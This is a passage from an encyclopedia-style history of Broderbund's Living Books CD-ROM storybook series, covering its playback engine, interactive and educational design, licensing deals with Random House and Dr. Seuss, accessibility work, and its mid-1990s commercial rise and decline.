sweatshop; meanwhile Lawrence shared an office room with Schlichting and frequently heard his disagreeable phone calls. Programming Schlichting campaigned for tools technologically ahead of their time to improve quality. In the early 1990s, CD-ROMs represented a "dramatic leap forward" and the promise that computers could offer immersive, interactive experiences. Software designers such as Schlichting looked to the new medium as an opportunity to reinvent the classic children's book". In response, Broderbund offered Schlichting an additional team of programmers. At this point in time, most Broderbund products were built primarily by one programmer per title, with assistance from contractors along the way. However, Schlichting wanted an engine that would allow the game to be pre-emptively designed to play across multiple platforms (Mac, PC, etc.), thereby allowing the CD-ROM to become more interactive than it had in the past. Programmer Glenn Axworthy created the Living Books engine, which made it possible for products to be written in Macromedia Director, then to edit the files into a "cross-platform, optimized playback format" that slow speed CD-ROMs could then play into limited memory computers at the appropriate speed "regardless of the speed of the CPU of the computer running the product". The Living Books engine "served as the foundation for the entire product line" and the same underlying technology was still being used in 1998, just with better animation and interactive design. The playback engine was designed to work across platforms without the animation needing to be redone. Matt Siegel created an animation driver that made "animations run consistently fast regardless of their size". This unique CD-ROM playback/interaction driver required three years of development using a core team of three programmers, who had to resolve issues such as compression, cross-platform operation, timing, and device control. The cutting-edge technology was used to make pages load, characters dance, and perfect the interactivity without much tweaking required. Key to the programming was in devising a way to allow for instantaneous mouse responses. This was "crucial", as without it playtesters would become frustrated by the delayed response to their mouse. The driver applied a "running man" during the delay between book pages, loading the animations while the program read the text aloud on each new page so they were ready to play. The driver would stream sound to occupy the user while images and animation were being loaded. This "trick", of turning off ambient movements until the biggest movement had finished playing, allowed Living Books to squeeze the program down to 2MB of ram.Just Grandma and Me ended up using 128MB of the available CD-ROM space. Later, graphic technician Rob Bell expanded the program with the interpretive language S-Lang which offered even greater possibilities. This driver allowed the creative team to work on quality without worrying about CD-ROM limitations. Schlichting considered the programmers the "hidden magic" behind Living Books. Further advancements made it easier to play; in 1996, a Living Books product would be used in a successful demo by Narrative Communications, in which Macromedia ShockWave compression and other technology was used to compress it from 2.5MB to 1.4MB. By 1997, Broderbund was able to "cram" eight Living Books titles onto a single CD-ROM as part of their Living Books Library series. To run Just Grandma and Me, a computer required the following hardware specifications and system requirements: a PC with an 80386 processor and 512x384, four megabytes of memory, a VGA monitor and adapter capable of displaying 256 colors or a 386 "MPC" machine with SuperVGA, a CD-ROM (compact disk) drive and a sound card compatible with Sound Blaster, Pro Audio Spectrum or Tandy sound devices, plus a Microsoft Windows operating environment." It also had to be able to run on computers ranging from a Mac LC to a Quadra 800, with consistent responsiveness. Noting that the market for Intel/MPC machines was double that of Mac market, Schlicting looked into alternative systems to design Living Books for. He investigated CD-I devices like Phillips but found the "resolution low, the interface clunky, and the format difficult to work with". As the series was mouse-driven, he found Nintendo style game controllers inappropriate; however, he thought the 3D0 Box had "a lot of promise". In the end no alternative systems would be used, except for the Tandy Video Information System and Philips CD-i consoles, on which Just Grandma and Me and Little Monster at School were released within a few months of their respective releases on PC/Mac. Just Grandma and Me accompanied Tandy's launch in October 1992, and the title suited Tandy's positioning as "provid[ing] fun in the process of learning" instead of being a video gaming console; Living Books users were able to engage with hotspots used their remote control. In September 1991, Doug Carlston told Digital Media “It's usually a truism that as storage capacity expands, costs go up accordingly... But this isn't the case for CD's which for 75 cents hold what would cost $5 to store on floppies", which is a significant margin increase for the lowered cost of goods in a $50 entertainment product". Doug suggested that the cost to produce a Living Book would "eventually be under $100,000 — 'substantially less' than a typical floppy-based title". He noted, “At this point, we're building engines for each optical platform, so we can just go directly from the data stream to the product, with no programming at all. “When we started this project two years ago, we decided the ‘virtual machine’ approach was the only way it seemed to make sense — it was a simple programming question. There was no rush to market, because there was no market.” Design Interactivity design Interactivity was vital in the design of the programs; when presenting demos to corporate executives, Schlichting would observe them fighting over the mouse and suggesting where to click. The games were packed with interactive hotspots. Schlichting chose to make "everything that looked clickable to actually be clickable", saturating each page with hotspots, to ensure the user was in control and supported in their decisions. He selected to existing picture books or designed books full of scenes that allowed for a wealth of exploration through clicking. All the objects, characters and individual words were "alive" and triggered by contact. Some hotspots were related to the story. However, peripheral "fun" hot spots were only added sparingly, so they would add surprise and offer "intermittent reinforcement" to encourage further exploration. Examples in Just Grandma and Me include: clams that sing in perfect three-part harmony, and a starfish that performs a vaudevillian routine with a top hat and cane. Interaction was designed to be "non-obvious", with hotspots including inanimate objects like chairs. On average, Arthur's Computer Adventure has 23 hotspots per screen, while five activities are included within the program. The Tortoise and the Hare contained around seven times as many incidental hot spots as supplemental ones. The gags were more layered in Dr Seuss’ ABC such that the user could click the same hotspot multiple times and get different responses. Arthur's Teacher Trouble had secret paper aeroplanes on every page; the Broderbund hint hotline received calls into the early morning asking where these planes were hidden. Activities were added to help develop matching, rhyming, memory and observation skills, among others. Each activity has three levels of difficulty. Stellaluna contained a 'Bat Quiz" to teach scientific facts about bats. Arthur's Reading Race contains an activity called Let Me Write, which allows kids to drag and drop screen objects onto a simple sentence to modify it or create their own. The title also contained a spelling mini-game, separate from the story, which users could play against an opponent or the computer. In Arthur's Computer Adventure, which combined a storybook with an activity center, users were able to play the in-universe title Deep Dark Sea that is central to the plot. The soundscape was important to the series; each title consists of hundreds of digital voices and sound effects, such as waves splashing, breezes blowing, and birds chirping in the case of Just Grandma and Me. Some of the sound effects were "clever", for example the poppy flowers made popping noises, and the rocks performed rock 'n' roll guitar riffs. One of the later titles The Berenstain Bears In the Dark featured an all-original soundtrack featuring bluegrass musicians, including Mike Marshall, Sally van Meter, Tony Furtado, and Todd Phillips, while Stellaluna had a soundtrack with original music interwoven with African percussion. A band 'The Wild Mangos' provided original songs for The Tortoise and the Hare, while Gary Schwantes produced music for Dr Seuss's ABC. Harry and the Haunted House came with 9 original songs which could be played on a CD player. The original songs in Sheila Rae, the Brave, about the adventures of a mouse heroine, featured lyrics that turn into pictures of the things they describe to encourage word recognition. They were written by Living Books composer Pat Farrell. In 1996, Living Books released their first sing-along animated storybook program. Upon previewing a gag in Just Grandma and Me where a bird swoops across the screen with an aeroplane sound effect, developers noted this elicited laughs and chuckles in the audience. The developers realised that with their visual awareness focused on the animation, the incongruent audio had a more subconscious cognitive impact, and the discrepancy between sound and audio created a "brain hiccup" where users would find the moment 'cute' but unsure exactly why. Ease of use design Ease of use was another important design philosophy; the interface was designed such that it could be used by even the youngest of children unaccompanied. Schlichting wanted the series to be "as easy to use as CD-audio". Decisions are presented as a straightforward choice, and "'yes' or 'no'" is consistently used throughout. Dust Or Magic, Creative Work in the Digital Age asserted that this is an application of Brenda Laurel's "communities of agents" concept in which 'helper characters engage in direct dialogue with the player and invite complicity"; it notes that in the Quit screen, the 'Yes' character nods mischievously as if to say "Go on, do it!", so that the player is urged to ignore the 'No' character who appears anxious and forlorn. Schlichting observed that teachers wanted something to occupy children for 20 minutes at a time. They wanted to be able to say "You and you, go play with Living Books" then attend to the children needing support; as a result Living Books was designed to have no install and play as soon as the CD was inserted and users clicked on the icon. When Schlichting was first designing Living Books, he visited computer stores to observe how software was displayed and marketed, and noted that they used their games' assets to show off the computer's capabilities. As a result, he developed an "attract mode" where at the beginning before the story starts, the main character direct addresses the user by introducing themselves, teaches the child how to play, and then invite them to participate. In Just Grandma and Me, the narrator Little Critter tells the user, "To have the story read to you, press this button. To play inside the story, press this button", pointing to the appropriate button onscreen. Instead of repeating the talk loop, he opted for a dance loop with music that would encourage kids to dance in the store, bringing the products attention. Important to his design was to never leave the screen static; to always have a piece of animation playing to say to the user "I'm alive. I'm alive". Users had the option to flip to their chosen screen directly without having to wait for preceding pages to play out.Living Books included the printed versions of the paperback books with the software to ensure there would be continuity where kids could play between the two and to encourage non-digital reading. Additionally, children were able to follow along in the physical book as the program read the story, and parents had the option of reading to the child the "old-fashioned way". Language design A challenge of the series was to inviting children to engage with "black-and-white abstraction" of text, when the relatable imagery proved more inviting. Schlichting found that a program can capture 80% of a child's attention for spoken information that they can both see and interact with. Living Books experimenting with 'living' text, where children could tap on any word and hear it pronounced or build the whole sentence word by word. Schlichting chose to highlight the text because he "found kids follow anything that moves...we could get them to follow the reading if that was the only thing on the screen that was moving". One of the biggest benefits of using a CD-ROM was the "ability to store lots of high quality speech". Every word had to be recorded in two different styles, once as part of the story and once as individual words which could be clicked on one-by-one. The individual words were recorded with fluctuation to fit how would fit into the larger sentence; this allowed emerging readers to map the language and construct the story in sentence units. The New Kid on the Block, which presented a collection of 18 funny poems by poet Jack Prelutsky, allowed players to click on the words to reveal a representative animation of the noun or verb, turning the program into a "living dictionary". This was used as an alternative to having the player click on illustrations directly. Both the first two titles in the series had English and Spanish language settings while Just Grandma and Me could also be played in French, German, and Japanese, all featured on the one disc; this multilingual feature would be explored in future entries. Most Living Books would be released in US English, UK English, and Spanish. The UK English versions had British accents for all the characters and colloquial words changed when appropriate (i.e., Mum not Mom). The New Kid on the Block is the only monolingual Living Book. The British English dub was published by Brøderbund from 1996 to 2000, and a French dub was published by UbiSoft's Pointsoft label in 1996 While not released in Latin America the Latin Spanish dub was created in 1992/1993-1996 and released in the US version. Two titles were published in Hebrew in 1995, while four titles were dubbed and published into Japanese and Italian. Just Grandma and Me 2.0 featured a European Spanish dub. Delta's Livros Vivos saw the series published in Brazilian Portuguese in 1998, and the German dub by The Learning Company (formerly SoftKey) was published in 1998 after Broderbund's acquisition by the company. Creating the localised editions often involved reworking the graphics, in order to sync the voices and avoid a ‘dubbed’ movie effect. While the series could be used for dual language learners, the titles did not come with a multilingual dictionary. The team also aimed to be "culturally correct" when translating to other languages, for instance the Arthur character "D.W." was renamed "Dorita" in Spanish after realising it was unusual for a local name to start with "W". Compute! suggested that "while the main goal of developing a multilingual program was more than likely an effort to increase its market share, doing so also enhances the story's educational value". Education design On the series' potential as a learning tool, Schlichting said, "software never replaces the place of a good teacher, but there are times when the teacher needs help" and that multimedia products "are great ways to do that". Schlichting resisted use of the term "Edutainment" to describe the series, though he felt the titles were more substantive than Nintendo games and described them as "invisible education." Marylyn Rosenblum, the vice president of education sales and marketing for Broderbund, commented, we don't make claims for teaching reading...[instead] we encourage children's natural love of reading." Originally designed for children in preschool and early elementary aged three to eight, the storybooks found audiences ranging as young as two and some programs reached kids nine and older, Schlichting noted that while younger players would click the words in sequence to "map the story", older players will click the words out-of-order to build their own silly sentences, allowing for "greater language play". In Harry and the Haunted House, older players found amusement in creating the sentence "the zombie has a stinky but[t]". This was a serendipitous form of play Schlichting never intended or expected. The user was provided two options to engage, a passive 'read to me' mode and the interactive 'play along' mode. By offering different play patterns depending on the user's level of reading fluency players felt able to "own" the story by "playing with the individual pieces". Users learn to read new words and also discover how words are constructed into sentences. Arthur's Computer Adventure contains 401 words of interactive text estimated to be at grade 3 readability level. The series included moral lessons, for instance Berenstain Bears Get into a Fight was released to help children with conflict resolution. Lucinda Ray, Education Product Manager at Brøderbund, developed the concept for, edited, and produced the Living Books School Edition. These School Editions were developed with the aid of classroom teachers, reading specialists, and curriculum experts, with an integrated language arts approach. School Editions contain: the CD-ROM, a print version of the title book, Lesson Plans, a thematic unit with activities, an annotated bibliography of relevant literature, printable worksheets, and bonus books or audio cassettes. They were designed specifically for teachers who are using the programs in a classroom, and included tech tips like shortcuts and special key commands to help guide the lesson. In 1994, Broderbund produced a supplementary set for teachers called the Living Books Framework, featuring integrated teaching material for each of the first four Living Books titles for $489.95 including the Living Books CD-ROMs; presented in a three-ring binder, they featured the original picture storybooks, several other books, and a tape of Jack Prelusky reading his 'The New Kid on the Block' poems. The kits also contained 'A Book Lover Approaches the Computer' articles that addressed key concerns of parents and teachers, technical tips, a curriculum matrix, a thematic unit, and classroom activities. Independence (1992–1994) Just Grandma and Me release Broderbund released their reimagining of Just Grandma and Me in 1992, and while there was an initial concern whether there were enough customers with CD drives to run the game, in the first six months Broderbund sold over 10 times more copies than they had initially projected. MacUser did a speed test on the storybook to check the loading time when turning pages and found that most take less than 15 seconds. Meanwhile, not having his hand in the day-to-day creative process of that work turned Mayer on to the idea of doing CD-ROMs himself. He and his partner, John Sansevere, formed their own company Big Tuna New Media to develop Mayer's animated storybooks. Teaming up with GT Interactive, their first two titles were "Just Me and My Dad" (1995) and "Just Me and My Mom" (1996) which according to The Fresno Bee "borrow[ed]" their design from Living Books. Big Tuna New Media would be approached by Disney and DreamWorks for CD-ROM development deals". By August 1992, the title was the interactive storybook's "first big hit", and one of the few available for purchase, along with the even earlier Canadian pioneer Discis Knowledge Research's Discis Books, whose 16 Mac titles and 11 CDTV titles had gained widespread classroom acceptance. Founded in 1988, Discis acquired the rights to children's stories and published them as CD-ROM-based interactive children's books. The second Living Books title, Arthur's Teacher Troubles, was debuted at Consumer Electronics Show showcasing its first 12 screens. When the game was demoed at trade shows, the developers observed audience reactions which proved to be a useful learning experience. Microsoft bought 300 disc copies and sent them to their hardware manufacturers, instructing them to ensure the software could run on their equipment. Before The Tortoise and the Hare was released, a prototype was shown at a trade show where a teacher in attendance noted that a scene where Hare picks up a newspaper, rolls it up, and stomps on it was encouraging kids to litter; in response Living Books redrew the scene, which now showed the tortoise scolding the hare, with the line of dialogue "Hey Hare, did you forget to recycle that newspaper?", who picks up the trash and disposes of it properly. Literacy in Australia: Pedagogies for Engagement singled out this moment for helping users "make sense of character motivations and actions". Due to the success of the first few titles, the Living Books division had the ability to add additional artists and musicians, and the team relocated to a new Broderbund office in Novato, California. When Just Grandma and Me was demoed at the 1992 Computer Game Developers' Conference, the "mesmerized" crowd of around 100 game designers "spontaneously erupted into enchanted choruses of 'Ohhh!' and 'Ahhh!' with every turn of the page". Broderbund expected the Living Books division to become "one of their essential businesses in the years ahead", and planned more products for both the MPC and Mac. The following year, Schlichting demoed Just Grandma & Me, along with two new products, Arthur's Teacher Trouble and the in-development New Kid on the Block, at the 1993 ACM SIGGRAPH conference. In 1996, The Berenstain Bears in the Dark became the first Living Books title to utilise leveling by offering three different degrees of difficulty for its activities and the first to employ 640 x 480 pixel screen size (formerly 512 x 384). These early successes "set off a frenzy of imitation by other companies", of which 7th Level's TuneLand was deemed the best by The Washington Post. Joint venture At the American Booksellers Association convention, Alberto Vitale, head of Random House Publishing (then owned by Advance Publications) and Dr. Seuss book rights holder, saw a demo of Just Grandma and Me and approached the team. Vitale became impressed with the series and decided to buy half of Living Books. In her role as Technical Creative Director, Bonifield created the Living Books production methodology that facilitated the $15 million deal. On September 9, 1993, the Living Books Partnership Agreement was signed between Broderbund, Random House, Random House New Media (a new division set up by its president Randi Benton) and Broderbund's Living Books, forming Living Books as a joint venture between Broderbund and Random House to publish story-based multimedia software for children and was 50% owned by each. As Broderbund's shares had recently decreased, at the time analysts were concerned that this was due to Broderbund's older titles, and that the company had concentrated its growth in new venture. Broderbund spun-off Living Books into its own independent company, which started operations in January 1994 under Broderbund/Random House. While Broderbund offered the already-published Living Books product line and the resources to produce more interactive storybooks, Random House offered additional funding and access to its library of children's book authors. This gave Broderbund access to more book titles. The new Living Books took over research and development, manufacturing and marketing associated with the creation of its products, which were distributed through Broderbund and Random House' respective channels under an affiliated label arrangement for Windows and Mac. A relocation of Living Books offices to San Francisco was announced on July 31, 1995, which Vitale completed in October of that year. Living Books' staff of 45 worked out of the new site to develop, produce and market the software, while assembly and shipment of final products would continue to be performed at Broderbund's facility in Petaluma. Unique for a kid's software company, this meant Living Books was created with a "strong, in-house foundation of experience" in all stages of the business, including product development, production, marketing and publicity. These were all coordinated at the Living Books headquarters in San Francisco. Meanwhile, assembly and shipping was handled by Broderbund's facility in Petaluma, California. Some of the titles were promoted via Distributor Softline, and Broderbund had accounts with retail stores like Musicland's Media Play and Trans World Music. Titles like Dr Seuss' ABC were available from mail order suppliers. Living Books became "one of the first alliances between dominant companies in their respective fields". The deal led to Broderbund's stock gaining $3.75 to $41. while the company's equity in income was boosted by approximately $3.9 million from the Living Books joint venture. Living Books heads Bonifield and Siegel left in 1994 to form digital video company Genuus, later commenting "at one time Broderbund was exciting, but it became big and lethargic". Jeff Schon, former Pee-wee's Playhouse producer, was brought in as CEO of Living Books and would lead the company for four years until 1997. From November 1995 – December 1996, Bobby Yarlagadda joined Living Books as VP and its first CFO, leading IT and Business Development groups; during this time he doubled the capacity for content production by setting up outsourcing contracts with suitable vendors. By 1997, the company was accepting product submissions from professional developers, and third-party outsourced production work on their website. After Yarlagadda's departure, he joined forces with Schlichting to set up software company The Narrative Communications Corporation while Schlichting was still at Living Books. Dr. Seuss license By 1994 there was a "scramble among multimedia developers to gobble up rights to intellectual property" for "translation to the new medium", and Dr. Seuss became "among the most hotly contested". Author Ted Geisel had died in 1991 and the multimedia rights to his works had become available. When Broderbund and Random House formed Living Books, their discussions centered around which books would be the best to adapt; once they discovered the Dr. Seuss rights were available they "went after them aggressively." Talent agency ICM Partners had arranged a parade of software firms including Microsoft, Paramount Interactive and Activision to visit Dr. Seuss' widow Audrey Geisel, chief executive of Dr. Seuss Enterprises and rights holder, who was known as a "fierce guardian of its artistic integrity". But Vitale encouraged Living Books to present to Geisel in a bid to acquire the digital rights; Living Books created a demo which also incorporated Broderbund's paint product, Kid Pix using stickers from Dr. Seuss' book I Can Draw It Myself. After showing the demo in front of Geisel, Baker, Carlston, and Vitale in silence, Schlichting decided to tell the story of being inspired to enter into the world of Dr. Seuss as a child, leading to Geisel telling her intellectual property lawyers "I've changed my mind, I'm going to work with him". While Geisel was not impressed with this first presentation and felt the demo was poor, she chose Living Books due to her "desire to honor her husband's 50-year association with Random House", giving them a second chance. Random House had been the sole publisher of the Dr. Seuss books since 1937. Brokered by Geisel's agency International Creative Management, Random House ended up securing the digital rights to Dr. Seuss for a deal said by a close source to be "well into the seven figures", and subsequently provided Living Books the "coveted" electronic rights to Dr. Seuss books along with other best-selling Random House children's authors. Signed and publicly announced in April 1994, the deal saw Living Books as the first company adapt Dr. Seuss to a digital format. Variety noted that the deal underscores how Living Books "positioned itself as a front-runner in the children's multi-media market", managing to secure a deal with Dr. Seuss Enterprises despite "competing companies offer[ing] richer financial packages". Their first Dr. Seuss title Dr Seuss' ABC was previewed at the 1995 Electronic Entertainment Expo to be released September that year, while The Cat in the Hat was in their future slate. Living Books aimed to publish up to 10 electronic titles the following year, including Dr. Seuss titles which would be released at the $40–$60 price point. Geisel was given approval rights on every stage of the Dr. Seuss Living Books products' development. Advertising Age saw Living Books' pending release of their first Dr. Seuss CD-ROMs as the industry's "most-watched developments". Geisel was present at the 1996 E3 Living Books booth to inaugurate the interactive version of Green Eggs and Ham, which was due for a release that Autumn. Growth (1994–1996) Commercial success The games were highly financially successful. However, the low price point and large development costs, coupled with the recentness of CD-ROMS, made it difficult for Living Books to turn a profit. Additionally, at the time, the school market is still fledgling, and schools rarely had the funding to afford computers for their students; as a result most of Living Books sales were into the home market. By 1995, Living Books would still be targeting its products at home buyers. In the first half of 1993, Broderbund sales jumped 69 percent, to $73 million, according to the Software Publishers Association, aided by Carmen Sandiego, Kid Pix, and the debut of Living Books. Just Grandma and Me became one of the best-selling CDs for children on its release in 1993. By August 1994, the series had sold tens of thousands of copies, and that year pre-tax profits of Living Books exceeded $6,000,000. By late 1994, the simultaneous success of best seller Myst (1993), and early learner Living Books had given the relatively small Broderbund dominance in two market segments. Broderbund's success allowed it to continue marketing to a mass consumer base, publishing software for entertainment, education, and home management; the company also offered a creatively free environment for its programmers who were able to push the boundaries of computer programming through titles like the CD-ROM series Living Books. Living Books would see an ongoing release of new titles and would continue to have respective sales. The first quarter of 1995 saw Broderbund mark an initial contribution of $1.7 million in nonoperating income from its 50 percent interest in Living Books. In January 1995, Rambabu (Bobby) Yarlagadda was appointed to the position of vice president and chief financial officer. Since its debut four years prior, Mercer Mayer's "Just Grandma and Me" had sold over 400,000 copies. During the fiscal 1995 year, Living Books grew approximately 50% primarily due to expansion of product lines and contributed 13% to Broderbund's fiscal 1995 revenue, more than Carmen Sandiego. Living Books became profitable and continued to expand. December 1996 saw Living Books' Green Eggs and Ham the 6th best-selling in the Home Education (MS-DOS/Windows) category, while Dr. Seuss’ ABC/Green Eggs and Ham was the 8th best-selling in the Home Education (Macintosh) category. From October 1996 to January 30, 1997, a promotional campaign was run in French magazine SVM where readers could collect a Broderbund-Living Books loyalty card by finding all the products from the Broderbund and Living Books ranges and win numerous prizes, including a demo CD-ROM to Myst or two educational titles. Living Books was No. 2 with 12% of market share for educational CD-ROMs in December 1999, behind Disney's 13.2%. Each game cost "hundreds of thousands of dollars" to produce; budgets ranged from $500,000–$1 million. Producer Philo Northrup noted that creating Green Eggs and Ham was "very expensive". The credits to Dr. Seuss's ABC lists over 100 names, including additional departments like musicians and choreographers. In 1997, Living Books had a Green Eggs and Hamulator Scavenger Hunt on their website, with 36 parts scattered across the Internet; the winners were awarded prizes. The company would grow to 100 people and produced a total of 20 titles. Trouble was brewing; from 1994 to 1995 Living Books' competition limited retail display space and drove down "family entertainment" product prices by more than 11 percent. Finding source material At the time, there was a "trend toward familiar characters". Jason Lippe, general manager at multimedia educational store Learningsmith, opined that newer educational programs were more successful in capturing children's interest because they were based upon characters the children already know. Publishers often sought stories from popular culture like film and TV. In contrast, Living Books primarily sourced material from classic literature including traditional tales like The Tortoise and the Hare, and enduring children's picture books from well-known authors such as Dr. Seuss's Green Eggs and Ham. The Cat in the Hat was released on the 40th anniversary year of the original book's publication. On May 24, 1994, Living Books acquired worldwide media rights to Berenstain Bears' First Time Books series from authors Stan and Jan Berenstain; the book rights were owned by Random House. Living Books sought to secure the rights to stories that had already seen "success and acceptance" among teachers, parents, and publishers. Stories like those of Mercer Mayer had been "well received" by children, leading to Living Books' interest in adapting them. Living Books material touched upon ideas familiar to children, such as in The Berenstain Bears Get in a Fight, where two kids squabble and their parents try to deal with the problem. Animation World Network named Living Books as a series from the 1996–7 season that "hope[d] to cash in on the success of existing animated properties", alongside Fox Interactive's Anastasia: Adventures with Pooka and Bartok and THQ's PlayStation action game, Ghost in the Shell. Originally, Mark Schlicting was going to make a Noddy book instead of this one, but he loved the Arthur story so much that he decided to stick with the latter. While most titles were based on popular franchises, two were brand new. The first original Living Books game that was not based on any existing books featured a modernized edition of Aesop's Tortoise and the Hare fable focusing on the 'slow and steady wins the race' moral; this story was retold by Schlichting and illustrated by Michael Dashow & Barbara Lawrence-Webster. Ruff's Bone was second original Living Books story, born from a collaboration between Broderbund and (Colossal) Pictures' New Media Division. It was co-produced by (Colossal) Pictures and written by (Colossal) Pictures head Eli Noyes; featuring a dog in search of his bone, the story was creative directed by Noyes. It was the first CD-ROM produced for Living Books by an external company. Noyes was inspired by Just Grandma and Me upon its 1992 release, having realised that CD-ROM was the "perfect modern-day medium for all my previous experience creating children's projects". Contrary to paper publishing projects, the team learnt that interactive storytelling relies more on collaboration like in film production, and appreciated the democratic decision-making culture. In September 1994, Living Books previewed Ruff's Bone at COMDEX. (Colossal) Pictures would lay off most of its staff in 1996; WildBrain Entertainment animation house, which largely consisted of ex-employees from (Colossal) Pictures, would be contracted by Living Books to work on Green Eggs and Ham. Meanwhile, the third original story Harry and the Haunted House, was written by Schlichting himself. Convinced that his concept for electronic books would work, he had written the story in 1988 specifically for the computer but never published it in paper form until the Living Books version was released. Schlichting said, "when I first wrote Harry and the Haunted House, I wanted to allow kids to go inside the pages of the storybook and play along with Harry and his friends as they overcome their imaginations while exploring the old house". In 1994, The Peep Show creator Kaj Pindal met with Schon regarding the characters and films in the Peep franchise (which began with the 1962 short film The Peep Show) to be adapted to the CD-ROM format, eventually securing a publisher's contract, with advance payment against royalties. Pindal began to work with Derek Lamb to create a prototype in the summer of 1996, though the project would eventually be cancelled. Adaptation The development team were committed to, as often as possible, working closely with each author to ensure a faithful rendering of the original story and its intent. These interactive storybooks were complete, animated renditions as opposed to the "highly edited and abridged versions" from other companies. Computer Museum Guide comments, "it's no coincidence that the books and the corresponding software are both popular". The use of a popular character like Arthur gave Arthur's Computer Adventure "significant shelf and package appeal to kids". The Living Books page illustrations generally replicated those from the book. However, Stellaluna, a story by Janell Cannon about a young fruit bat who becomes separated from her mother, varied from the source material through its language, visual perspectives, images, and animations which affected the orientation, social distance, and tone of the experience. Reframing research and literacy pedagogy relating to CD narratives writes that when a character queries Stellaluna's unusual behaviours, they gaze directly at the reader and demand an interpersonal engagement of the reader, as opposed to the book version where the character's gaze is directed at Stellaluna as an offer and the reader looks on with interpersonal detachment. Living Books' narrated, highlighted, and clickable text is identical to that of the book, though the characters sometimes have "conversational asides". Stellaluna contains 21 additional lines of text, however Cannon's version has just fifteen pieces of spoken or thought-out dialogue for Stellaluna. Schlichting said "our relationship with the authors of the original books was that we would be taking their babies, their stories, their characters, and bring them over into animated media for the first time". Arthur had never had an animated voice before. (Living Books' 1992 release Arthur's Teacher Trouble predated the popular TV series by four years). Just Grandma and Me was the first digital outing for Mercer Mayer. Schlichting asserts that he was the first designer to digital life the works of Dr. Seuss, Marc Brown, Stan and Jan Beranstain, Mercer Meyer, and Jack Prelutsky. That said, Living Books' two titles The Berenstain Bears Get in a Fight (1995) and The Berenstain Bears in the Dark (1996) were preceded by several Berenstain Bears titles released by Compton New Media. Schlicting observed that Living Books often had a "profound effect" on their original authors; upon seeing Arthur's Teacher Trouble, Marc Brown said it "change[d] the way he thinks about books", and from then on he wrote books with animation and interaction in mind. Kevin Henkes, creator of Sheila Rae, the Brave, said, "for someone who doesn't own a computer, having one of my stories on CD-ROM is amazing...I realize that developing children's software is very different from telling a story in a traditional book format, and I appreciate Living Books' commitment to quality and deep concern for its audience". Stan Berenstain, co-creator of The Berenstain Bears, said of their digital adaption, "the team from Living Books understands how important humor and great visuals are in communicating information to children". After spending months on a prototype for New Kid on the Block, Schlicting presented the interactive version to the book author Jack Prelutsky; afterwards he turned to Schlicting and exclaimed, "Will you marry me?". Geisel expressed initial concerns about the quality and wanted Dr. Seuss adaptions to be "absolutely line-proof to the books", though he relented that her husband would be "enchanted" by the "interactive personal creative possibilities" that the new form of communication offered, and was supportive of the "hidden learning process". Of Green Eggs and Ham, she commented, "I am delighted, as I know Ted would be, with the conversion of his most popular book onto CD-ROM by Living Books". Just Grandma and Me was Mercer's first attempt at marrying the printed book and the computer into an educational and entertaining experience for children; of the program's success he said, "It was kind of a surprise". Disability In response to a call by Alliance for Technology Access (ATA) for software companies to design products that were accessible to users with disabilities, Living Books stated their commitment to addressing accessibility issues by designing interactive, animated storybooks for all children, regardless of their ability levels in order to "broaden its scope of access". Living Books collaborated with Alliance in the design process, inviting them to test Broderbund's software with various assistive devices including screen enlargement programs, such as inLarge, and alternative keyboard access programs, such as IntelliKeys. Closed-captioned CD-ROMs were virtually non-existent by 1996 and there wasn't an organized effort to encourage multimedia companies to provide subtitles for plot-intensive products; Living Books mostly circumvented this by displaying the story text on screen. 23 products including Living Books titles went through the Alliance testing process, and Alliance created a list of Broderbund products that could be accessed with each device. This resulted in the incorporation of the ability to enlarge the standard size of print and graphics, the option of using voice commands instead of keystrokes or a mouse, thereby assisting users to access the 'read aloud' mode and the settings options. In 1995 the ATA released a short promotional video, Quality of Life: Alliance for Technology Access; production costs were underwritten by IBM's Special Needs Systems with help from past ATA supporters including Broderbund and Living Books. Ray worked with companies that adapted the products for use on special keyboards designed for children who had problems using a standard mouse to interact with the stories (cerebral palsy, muscular dystrophy, autism, learning delays). Living Books became "especially popular with autistic children". In January 1997, Living Books donated four pieces of software to The Children's Trust after attending a Children's Head Injury Trust awareness week and learning that the Trust had donated a Compaq Presario computer; children with limited abilities played the program via a tracking system produced by Scope's Microtechnology Services. This move was praised by the facility's cognitive remediation and recreational/rehabilitation departments. Little Ark Interactive In 1996, Broderbund created the division Little Ark Interactive as a Living Books imprint. The project was at the direction of Doug Carlston, co-founder and CEO of Broderbund, whose father had been a priest. The joint venture's new division was created to develop and sell children's titles based on the Old Testament, a niche market with competitors like Compton's New Media product Children's Bible Stories. Little Ark Interactive then sought out Red Rubber Ball, the multimedia division of Atlanta-based Christian television and interactive music video producer The Nicholas Frank Company, to develop the titles. In December 1996, Red Rubber Ball, signed a licensing agreement with Living Books to develop CD-ROM titles under Red Rubber Ball's children's label Little Works to be published under Living Books' new Little Ark Interactive imprint; Red Rubber Ball completed writing, art, and advisory board duties while Living Books with special effects, programming, and marketing. Little Works''' The Story of Creation and Little Works' Daniel in the Lion's Den, adapted biblical-themed Old Testament stories through "art, music and characterizations", were developed under the direction of members of the original Living Books team. Cel animation was completed by J. Dyer Animation and Design EFX respectively. The scripts for the two stories were written by children's author Ruth Tiller while musician Mark Aramian created compositions for the titles. The two stories were released on January 28, 1997 as the first of a planned series of five or six religious titles to be completed throughout 1997. To ensure they reached the broadest possible audience, the CD-ROM titles were screened by a multi-denominational panel of religious experts that included a rabbi, two pastors and a theologian. Little Ark Interactive anticipated a huge market as the Bible was still a best-seller in the United States centuries after its first publication, and as people of Jewish, Christian and Islamic faith all looked to the Old Testament. Little Ark also aimed to tap into nonreligious and non-denominational families who wanted to teach their children about the Bible. Trouble (1996–1997) Market saturation Living Books began to face growing competition from Disney Interactive (Disney's Animated Storybook) and Microsoft in the animated storybook genre. These companies flooded retail outlets with low-cost titles, reducing the market value from $60–70 to $30–40 off an $8 cost, making it difficult to complete at the same price point. Living Books' sales dropped while costs increased. Little Ark Interactive products entered the market at around $20. Living Books became pressured to produce games at a faster pace while retaining their superior level of quality. This continued into fiscal year 1997, where the market for CD-ROM children's interactive storybooks continued to be "intensely competitive", which resulted in average selling prices being pushed down; Living Books had competitors with access to proprietary intellectual property content, and the financial resources to leverage branded media through film and TV. Media companies began leaving the multimedia business or downsized; GTE Entertainment announced it would shut down in March 1997, while Disney Interactive, Philips Interactive, and Viacom NewMedia cut jobs and even entire divisions to save money. Publishing houses that had previous entered the multimedia business were forced to downsizing their operations or exit the industry entirely. The state of the CD-ROM industry was often put down to "inflated prices, mediocre titles, incompatibilities and bugs". However, Salon wrote that the financial struggle of even a reputable company like Living Books demonstrated that the "current woes of the multimedia b[usiness]" couldn't be "blamed simply on 